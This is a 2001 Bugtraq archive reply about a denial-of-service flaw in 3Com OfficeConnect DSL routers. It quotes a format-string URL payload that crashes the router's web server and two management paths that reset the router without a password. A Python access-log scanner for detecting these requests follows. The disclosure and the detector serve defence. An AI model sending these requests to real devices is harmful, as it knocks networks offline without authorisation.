Bugtraq mailing list archives

Re: 3COM OfficeConnect DSL router vulnerabilities


From: James Renken <jrenken () sandwich net>
Date: Tue, 15 May 2001 14:01:25 -0700 (PDT)

This buffer overflow exploit is effective against the 3Com OfficeConnect
Remote 840 SDSL router, as well.  NorthPoint Communications (and probably
other ISPs) resold this router in some areas of the U.S.

When I tested it, the router ceased to function and its LEDs began
flashing, but it did not automatically reset - I had to disconnect and
reconnect the power cable.  I tested this with software version 1.0.7,
firmware 4.2.  (The router model number is 3c840-US.)

The unprotected adsl_pair_select and adsl_reset problems aren't present on
the 840.

3Com helpfully provides no e-mail support for this product, and their
telephone support group was unable to find any support information for
it...

-- 
James Renken, System Administrator                    jrenken () sandwich net
Sandwich.Net Internet Services      http://sandwich.net/      760-729-4609


On Tue, 15 May 2001, inc wrote:

Yesterday night I discovered a vulnerability. The router is a 3COM
OfficeConnect 812 and the vulnerability is on the HTTP server, on port 80.
(snip)
http://192.168.1.254/graphics/sml3com%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%
s%s%s%s%s%s%s%s%s%%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s

...the router causes an NMI, red lights, flashing lights... and it's dead...
it disconnects and comes online again in a minute.
(snip)
ANNEX:

http://192.168.1.254/adsl_pair_select
http://192.168.1.254/adsl_reset

Very unsecure for strangers ;-)... the server here doesn't ask for password
so you cant reset the router from the own web (and without credentials)
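
For anyone with one of these routers behind a logging proxy or IDS, the two behaviours reported in this thread (printf-style specifiers in the request path, and requests to the management paths that answer without a password) can be flagged from access logs. This is an added example, not part of either post; the Common Log Format input, the sample lines, and the names `classify`, `scan` and `min_specs` are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Request line inside a Common Log Format entry (assumed log format).
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# printf-style conversions still present after one round of URL decoding.
FORMAT_SPEC = re.compile(r"%[sdnxpcu]")
# Management paths the quoted report says answer without a password.
UNAUTH_PATHS = ("/adsl_pair_select", "/adsl_reset")

# Constructed sample lines, not captured traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [15/May/2001:09:12:01 -0700] "GET /graphics/logo.gif HTTP/1.0" 200 1043',
    '10.0.0.9 - - [15/May/2001:09:13:44 -0700] "GET /graphics/sml3com%s%s%s%s%s%s HTTP/1.0" 000 0',
    '10.0.0.9 - - [15/May/2001:09:20:10 -0700] "GET /graphics/sml3com%25s%25s%25s%25s HTTP/1.0" 000 0',
    '10.0.0.7 - - [15/May/2001:09:31:02 -0700] "GET http://192.168.1.254/adsl_reset HTTP/1.0" 200 0',
    '10.0.0.5 - - [15/May/2001:09:40:55 -0700] "GET /index.html?q=100%25 HTTP/1.0" 200 512',
]


def classify(line, min_specs=3):
    """Return the list of finding labels for one access-log line."""
    match = REQUEST.search(line)
    if not match:
        return ["unparsed"]
    try:
        raw_path = urlsplit(match.group("target")).path
    except ValueError:
        return ["unparsed"]
    # Decode once so "%25s" is seen as "%s"; an invalid escape such as "%s"
    # passes through unquote() unchanged.
    path = unquote(raw_path)
    findings = []
    if len(FORMAT_SPEC.findall(path)) >= min_specs:
        findings.append("format-specifiers-in-path")
    if path.rstrip("/") in UNAUTH_PATHS:
        findings.append("unauthenticated-management-path")
    return findings


def scan(lines, min_specs=3):
    """Return (client_ip, findings) for each line that raised a finding."""
    hits = ((line.split(" ", 1)[0], classify(line, min_specs)) for line in lines)
    return [(client, findings) for client, findings in hits if findings]


if __name__ == "__main__":
    for client, findings in scan(SAMPLE_LOG):
        print(client, ", ".join(findings))
```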

